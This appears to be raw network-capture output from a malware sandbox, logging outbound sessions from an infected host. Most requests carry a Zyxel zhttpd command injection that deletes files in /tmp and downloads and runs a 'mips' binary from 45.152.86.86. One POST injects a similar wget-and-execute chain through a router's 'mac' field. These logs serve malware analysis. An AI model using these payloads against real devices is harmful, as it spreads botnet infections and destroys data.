                                        Mar 31, 2024 09:21:38.279218912 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:21:38 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5477192.168.2.235091624.170.206.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:39.090086937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5478192.168.2.234394037.181.235.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:39.090161085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5479192.168.2.235448427.217.183.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:39.090231895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5480192.168.2.2356322117.126.63.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:39.090295076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5481192.168.2.233656242.203.206.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:39.090368032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5482192.168.2.2342438200.65.191.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:39.090478897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5483192.168.2.234790679.45.207.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:40.100187063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5484192.168.2.234666274.125.20.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:40.100256920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5485192.168.2.235138457.222.111.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:40.100333929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5486192.168.2.2335096140.213.13.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:40.100403070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5487192.168.2.234530648.127.8.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:41.109944105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5488192.168.2.2346848132.116.6.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:41.110193968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5489192.168.2.2335530178.80.111.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:41.110281944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5490192.168.2.2349964142.202.79.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:41.110327005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5491192.168.2.235636263.190.162.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:41.110404968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5492192.168.2.236001243.136.20.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:42.114392996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5493192.168.2.235318449.189.51.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:42.114424944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5494192.168.2.2339112147.165.87.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:42.114561081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5495192.168.2.2350352150.180.57.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:42.114573956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5496192.168.2.235923445.60.89.1488080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:42.475848913 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:42.587894917 CEST909INHTTP/1.1 503 Service Unavailable
                                        Content-Type: text/html
                                        Cache-Control: no-cache, no-store
                                        Connection: close
                                        Content-Length: 689
                                        X-Iinfo: 12-92977526-0 0NNN RT(1711869702474 47) q(0 -1 -1 -1) r(0 -1)
                                        Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 32 2d 39 32 39 37 37 35 32 36 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 31 31 38 36 39 37 30 32 34 37 34 25 32 30 34 37 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 34 34 38 30 38 35 33 36 35 32 35 36 38 38 35 38 33 36 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 34 34 38 30 38 35 33 36 35 32 35 36 38 38 35 38 33 36 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=12-92977526-0%200NNN%20RT%281711869702474%2047%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-448085365256885836&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-448085365256885836</iframe></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5497192.168.2.233634681.159.237.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:43.117568016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5498192.168.2.23432425.239.149.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:43.117610931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5499192.168.2.2344346155.10.133.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:43.117727995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5500192.168.2.2343496218.91.150.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:43.117821932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5501192.168.2.234627863.229.98.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:43.117856026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5502192.168.2.233675850.159.175.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131660938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5503192.168.2.2342394221.249.124.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131706953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5504192.168.2.234892619.209.4.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131757975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5505192.168.2.2347146104.190.251.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131793022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5506192.168.2.2338134116.19.247.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131844044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5507192.168.2.233790287.22.109.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131908894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5508192.168.2.2334458130.81.138.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131942034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5509192.168.2.2351200159.111.182.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.131988049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5510192.168.2.236010065.27.128.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132060051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5511192.168.2.234542658.4.13.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132102966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5512192.168.2.235493887.131.221.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132152081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5513192.168.2.2337314152.67.87.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132204056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5514192.168.2.234973684.220.186.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132261038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5515192.168.2.2351954158.97.9.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132297993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5516192.168.2.235927495.26.224.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132353067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5517192.168.2.2333354213.79.94.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132422924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5518192.168.2.236039896.235.55.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132448912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5519192.168.2.2347142102.52.152.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132494926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5520192.168.2.233670694.124.179.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132534981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5521192.168.2.233397847.78.8.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132605076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5522192.168.2.233676086.66.91.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132635117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5523192.168.2.234708668.178.208.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132678032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5524192.168.2.233960841.214.72.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132728100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5525192.168.2.2346624190.132.223.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132802963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5526192.168.2.235733248.188.19.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132834911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5527192.168.2.235060076.130.165.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132888079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5528192.168.2.2346576192.81.238.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132937908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5529192.168.2.234921457.98.144.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.132994890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5530192.168.2.2343138197.110.68.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.133049965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5531192.168.2.235324846.245.48.87443
                                        TimestampBytes transferredDirectionData
